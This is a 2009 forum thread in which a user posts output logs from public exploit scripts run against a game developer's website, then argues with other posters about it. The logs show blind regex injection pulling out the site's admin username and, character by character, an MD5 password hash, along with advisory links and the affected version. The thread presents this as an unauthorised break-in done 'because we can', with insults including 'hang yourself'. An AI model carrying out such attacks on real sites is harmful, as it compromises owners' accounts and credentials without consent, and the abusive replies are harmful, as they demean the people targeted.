Insignificant Studios

Schokobecher · Nov 1, 2009

Well,
I ~~hate~~ like his game

Maybe he will notice.
good for him.

http://imgur.com/arPhV.png
http://imgur.com/VYPef.png
http://imgur.com/Uk4zk.png
http://imgur.com/uGY8L.png
http://imgur.com/OaEzr.png
http://imgur.com/XrW1X.png

http://www.securiteam.com/unixfocus/5JP0N0KI0C.html
http://www.securiteam.com/exploits/5KP0D2KGUI.html
http://www.waraxe.us/advisory-60.html

Waraxe is just fun.
Well, before you comment:
This wasn't a hack or something.
Public Exploits.

Validating target URL
URL is valid
Total 1 user(s) detected:
1 admin(s)
0 editor(s)
0 journalist(s)
0 commenter(s)
Pretesting passed successfully - target is vulnerable!
Testing ^([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^([abcdefghij])
Found 1 match(es)
Testing ^([abcde])
Found 1 match(es)
Testing ^([ab])
Found 1 match(es)
Testing ^([a])
Found 1 match(es)
Testing for full match a
Not full match: a
Testing ^a([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^a([abcdefghij])
Testing ^a([klmnopqrst])
Found 1 match(es)
Testing ^a([klmno])
Testing ^a([pqrst])
Found 1 match(es)
Testing ^a([pq])
Testing ^a([rst])
Found 1 match(es)
Testing ^a([r])
Found 1 match(es)
Testing for full match ar
Not full match: ar
Testing ^ar([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^ar([abcdefghij])
Testing ^ar([klmnopqrst])
Found 1 match(es)
Testing ^ar([klmno])
Testing ^ar([pqrst])
Found 1 match(es)
Testing ^ar([pq])
Testing ^ar([rst])
Found 1 match(es)
Testing ^ar([r])
Testing ^ar([st])
Found 1 match(es)
Testing ^ar()
Testing ^ar([t])
Found 1 match(es)
Testing for full match art
Not full match: art
Testing ^art([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^art([abcdefghij])
Found 1 match(es)
Testing ^art([abcde])
Testing ^art([fghij])
Found 1 match(es)
Testing ^art([fg])
Testing ^art([hij])
Found 1 match(es)
Testing ^art([h])
Found 1 match(es)
Testing for full match arth
Not full match: arth
Testing ^arth([abcdefghijklmnopqrst])
Testing ^arth([uvwxyz0123456789 ._-])
Found 1 match(es)
Testing ^arth([uvwxyz0123])
Found 1 match(es)
Testing ^arth([uvwxy])
Found 1 match(es)
Testing ^arth([uv])
Found 1 match(es)
Testing ^arth()
Found 1 match(es)
Testing for full match arthu
Not full match: arthu
Testing ^arthu([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^arthu([abcdefghij])
Testing ^arthu([klmnopqrst])
Found 1 match(es)
Testing ^arthu([klmno])
Testing ^arthu([pqrst])
Found 1 match(es)
Testing ^arthu([pq])
Testing ^arthu([rst])
Found 1 match(es)
Testing ^arthu([r])
Found 1 match(es)
Testing for full match arthur
Not full match: arthur
Testing ^arthur([abcdefghijklmnopqrst])
Testing ^arthur([uvwxyz0123456789 ._-])
Found 1 match(es)
Testing ^arthur([uvwxyz0123])
Testing ^arthur([456789 ._-])
Found 1 match(es)
Testing ^arthur([45678])
Testing ^arthur([9 ._-])
Found 1 match(es)
Testing ^arthur([9 ])
Found 1 match(es)
Testing ^arthur([9])
Testing ^arthur([ ])
Found 1 match(es)
Testing for full match arthur
Not full match: arthur
Testing ^arthur ([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^arthur ([abcdefghij])
Testing ^arthur ([klmnopqrst])
Found 1 match(es)
Testing ^arthur ([klmno])
Found 1 match(es)
Testing ^arthur ([kl])
Found 1 match(es)
Testing ^arthur ([k])
Testing ^arthur ([l])
Found 1 match(es)
Testing for full match arthur l
Not full match: arthur l
Testing ^arthur l([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^arthur l([abcdefghij])
Found 1 match(es)
Testing ^arthur l([abcde])
Found 1 match(es)
Testing ^arthur l([ab])
Testing ^arthur l([cde])
Found 1 match(es)
Testing ^arthur l([c])
Testing ^arthur l([de])
Found 1 match(es)
Testing ^arthur l([d])
Testing ^arthur l([e])
Found 1 match(es)
Testing for full match arthur le
Not full match: arthur le
Testing ^arthur le([abcdefghijklmnopqrst])
Found 1 match(es)
Testing ^arthur le([abcdefghij])
Found 1 match(es)
Testing ^arthur le([abcde])
Found 1 match(es)
Testing ^arthur le([ab])
Testing ^arthur le([cde])
Found 1 match(es)
Testing ^arthur le([c])
Testing ^arthur le([de])
Found 1 match(es)
Testing ^arthur le([d])
Testing ^arthur le([e])
Found 1 match(es)
Testing for full match arthur lee
Full username found: arthur lee

Fetched 1 usernames with reglevel 'admin'

arthur lee

Total time spent: 48 seconds
HTTP requests made: 95

Questions and feedback - http://www.waraxe.us/forums.html
See ya!

schokobecher@HellGate:~/Desktop$ php cutemd5.php
Validating target URL
URL is valid
Pretest 1 passed - username OK
Pretest 2 passed - regex injection OK
Pretest 3 passed - regex injection OK
Finding hash char pos 0
Position 0: [89abcdef]
Position 0: [89ab]
Position 0: [ab]
Position 0: [a]
Current hash: a
Finding hash char pos 1
Position 1: [01234567]
Position 1: [0123]
Position 1: [23]
Position 1: [3]
Current hash: a3
Finding hash char pos 2
Position 2: [89abcdef]
Position 2: [cdef]
Position 2: [ef]
Position 2: [f]
Current hash: a3f
Finding hash char pos 3
Position 3: [01234567]
Position 3: [4567]
Position 3: [45]
Position 3: [5]
Current hash: a3f5
Finding hash char pos 4
Position 4: [89abcdef]
Position 4: [cdef]
Position 4: [cd]
Position 4: [d]
Current hash: a3f5d
Finding hash char pos 5
Position 5: [01234567]
Position 5: [4567]
Position 5: [67]
Position 5: [7]
Current hash: a3f5d7
Finding hash char pos 6
Position 6: [89abcdef]
Position 6: [cdef]
Position 6: [ef]
Position 6: [f]
Current hash: a3f5d7f
Finding hash char pos 7
Position 7: [01234567]
Position 7: [4567]
Position 7: [45]
Position 7: [4]
Current hash: a3f5d7f4
Finding hash char pos 8
Position 8: [01234567]
Position 8: [0123]
Position 8: [01]
Position 8: [0]
Current hash: a3f5d7f40
Finding hash char pos 9
Position 9: [89abcdef]
Position 9: [89ab]
Position 9: [ab]
Position 9:
Current hash: a3f5d7f40b
Finding hash char pos 10
Position 10: [89abcdef]
Position 10: [cdef]
Position 10: [ef]
Position 10: [f]
Current hash: a3f5d7f40bf
Finding hash char pos 11
Position 11: [01234567]
Position 11: [0123]
Position 11: [01]
Position 11: [1]
Current hash: a3f5d7f40bf1
Finding hash char pos 12
Position 12: [01234567]
Position 12: [0123]
Position 12: [23]
Position 12: [3]
Current hash: a3f5d7f40bf13
Finding hash char pos 13
Position 13: [89abcdef]
Position 13: [89ab]
Position 13: [ab]
Position 13:
Current hash: a3f5d7f40bf13b
Finding hash char pos 14
Position 14: [01234567]
Position 14: [4567]
Position 14: [67]
Position 14: [7]
Current hash: a3f5d7f40bf13b7
Finding hash char pos 15
Position 15: [01234567]
Position 15: [0123]
Position 15: [23]
Position 15: [3]
Current hash: a3f5d7f40bf13b73
Finding hash char pos 16
Position 16: [89abcdef]
Position 16: [89ab]
Position 16: [ab]
Position 16:
Current hash: a3f5d7f40bf13b73b
Finding hash char pos 17
Position 17: [89abcdef]
Position 17: [cdef]
Position 17: [cd]
Position 17: [d]
Current hash: a3f5d7f40bf13b73bd
Finding hash char pos 18
Position 18: [89abcdef]
Position 18: [cdef]
Position 18: [ef]
Position 18: [f]
Current hash: a3f5d7f40bf13b73bdf
Finding hash char pos 19
Position 19: [01234567]
Position 19: [0123]
Position 19: [01]
Position 19: [1]
Current hash: a3f5d7f40bf13b73bdf1
Finding hash char pos 20
Position 20: [89abcdef]
Position 20: [cdef]
Position 20: [ef]
Position 20: [e]
Current hash: a3f5d7f40bf13b73bdf1e
Finding hash char pos 21
Position 21: [89abcdef]
Position 21: [cdef]
Position 21: [cd]
Position 21: [c]
Current hash: a3f5d7f40bf13b73bdf1ec
Finding hash char pos 22
Position 22: [89abcdef]
Position 22: [89ab]
Position 22: [89]
Position 22: [9]
Current hash: a3f5d7f40bf13b73bdf1ec9
Finding hash char pos 23
Position 23: [89abcdef]
Position 23: [cdef]
Position 23: [cd]
Position 23: [d]
Current hash: a3f5d7f40bf13b73bdf1ec9d
Finding hash char pos 24
Position 24: [01234567]
Position 24: [4567]
Position 24: [67]
Position 24: [7]
Current hash: a3f5d7f40bf13b73bdf1ec9d7
Finding hash char pos 25
Position 25: [89abcdef]
Position 25: [89ab]
Position 25: [89]
Position 25: [9]
Current hash: a3f5d7f40bf13b73bdf1ec9d79
Finding hash char pos 26
Position 26: [89abcdef]
Position 26: [89ab]
Position 26: [ab]
Position 26: [a]
Current hash: a3f5d7f40bf13b73bdf1ec9d79a
Finding hash char pos 27
Position 27: [01234567]
Position 27: [4567]
Position 27: [45]
Position 27: [4]
Current hash: a3f5d7f40bf13b73bdf1ec9d79a4
Finding hash char pos 28
Position 28: [89abcdef]
Position 28: [cdef]
Position 28: [ef]
Position 28: [f]
Current hash: a3f5d7f40bf13b73bdf1ec9d79a4f
Finding hash char pos 29
Position 29: [89abcdef]
Position 29: [89ab]
Position 29: [89]
Position 29: [9]
Current hash: a3f5d7f40bf13b73bdf1ec9d79a4f9
Finding hash char pos 30
Position 30: [89abcdef]
Position 30: [cdef]
Position 30: [cd]
Position 30: [d]
Current hash: a3f5d7f40bf13b73bdf1ec9d79a4f9d
Finding hash char pos 31
Position 31: [89abcdef]
Position 31: [89ab]
Position 31: [ab]
Position 31:
Current hash: ****************************
Final MD5 hash: **************************

Total time spent: 69 seconds
HTTP requests made: 132

Questions and feedback - http://www.waraxe.us/forums.html
See ya!

Works till version 1.4.5
Problem is found within the search.php

Fire1052 · Nov 1, 2009

Seriously, why?

Schokobecher · Nov 1, 2009

Beacuse we can.

Fire1052 · Nov 1, 2009

I guess I'll go ahead and leave you, but I think you'd prefer to stay inside.

Schokobecher · Nov 1, 2009

Fine.
Hang yourself.

€:

Oh hey:
We have a response.

Guess what I replied

Oh and I'm fucking famous now

Insignificant Studios

cool read; ironically when you say ‘update,’ you forget that you’re using an exploit on an outdated page that i keep up for posterity. i’ve taken that page down now so go on and google “wordpress exploits” now so that you can pretend to be neo from the matrix and take down the real deal!

hope it was worth

a) getting banned on a cave story forum

b) looking like a nerd

c) looking like a virgin nerd (p.s. when you act like a douche don’t forget to use an alternate account so that google doesn’t give away the fact that you’re an anime loving 17 year old nerd hurr)

hope you can find google exploits to get a life, nerd, heh.

- arthur

DoubleThink · Nov 2, 2009

Holy shit dude, that's like, almost publicity.

Hidden text highlight (or click) to view:

...Nerd.

Schokobecher · Nov 2, 2009

You make me cry.
I just wanted to help him.
Well.
Next Time I won't be nice and fluffy :3

GIRakaCHEEZER · Nov 2, 2009

Schokobecher said:
You make me cry.
I just wanted to help him.
Well.
Next Time I won't be nice and fluffy :3

Lol I think he thinks you actually got banned, because of your misleading custom title and avatar.

And yeah it could be worse. Still, I guess hacking his site isn't the best way to show that's it vulnerable. That's like poking a bear to see if it will eat you

. It might not, but it'll still beat the shit out of you (normally).

Schokobecher · Nov 2, 2009

But maybe he wil have sex with you

Or he will die.
of swine flu.
MAYBE.
Well.. all I did is showing him the screens.
I don't really care.
Feel my ePenis.

Fire1052 · Nov 2, 2009

GIRakaCHEEZER said:
Lol I think he thinks you actually got banned, because of your misleading custom title and avatar.

And yeah it could be worse. Still, I guess hacking his site isn't the best way to show that's it vulnerable. That's like poking a bear to see if it will eat you :eek: . It might not, but it'll still beat the shit out of you (normally).

This. Definitely this.

Skeik_Sprite · Nov 4, 2009

I'm confused. You broke into his website why?

DoubleThink · Nov 4, 2009

Because he could.

Literally, that's it, he found an exploit in an old version of php so he haxxed the old Underside site.

VoidMage_Lowell · Nov 4, 2009

That wasn't very nice...

What about just not liking the guy?

Schokobecher said:
Well,
I ~~hate~~ like his game

I can't really tell if it's sarcasm or not, but I've heard a lot of bad things about this guy, so I assumed Schoko disliked him. Does he?
Still, seems kinda harsh, hacking his site....

S. P. Gardebiter · Nov 4, 2009

Re: That wasn't very nice...

VoidMage_Lowell said:
I can't really tell if it's sarcasm or not, but I've heard a lot of bad things about this guy

Yeah, me too. I really dislike him. He's acting like a total idiot.

VoidMage_Lowell said:
Still, seems kinda harsh, hacking his site....

Schoko was just calling attention to a secruity breach. I don't see anything wrong with that.

Lace · Nov 5, 2009

hardy har schoko
did make me laugh that he thught you were banned though.
mmmm.

VoidMage_Lowell · Nov 5, 2009

Still wasn't very nice...

S. P. Gardebiter said:
Schoko was just calling attention to a secruity breach. I don't see anything wrong with that.

Yeah, he got his attention, all right :rolleyes:

Still, not the nicest way to do it...
Even if the guy's an ass and his resulting reply is comical

;

Skeik_Sprite · Nov 5, 2009

Re: Still wasn't very nice...

I don't know the guy but I would think his response is justified. If you take down his website of course he's going to be mad, even if you're doing it to "tell him to update." If you thought he should update; which I doubt is the case, email him about it. If you don't like him or his game, move on with life :/

I would think guys here would like The Underside, what he's doing is not much different then what goes on when you mod Cave Story.

Fire1052 · Nov 5, 2009

Re: Still wasn't very nice...

Hey, guys, at least he didn't pretend to release a demo that was a virus or something. Well, I guess the demo's done, so they might not fall for that, but, still. Be glad he didn't try.

DoubleThink · Nov 5, 2009

Ragging on TU for being a CS ripoff? That is so 2007.

Orangedawg · Nov 5, 2009

well thats not very nice :rolleyes: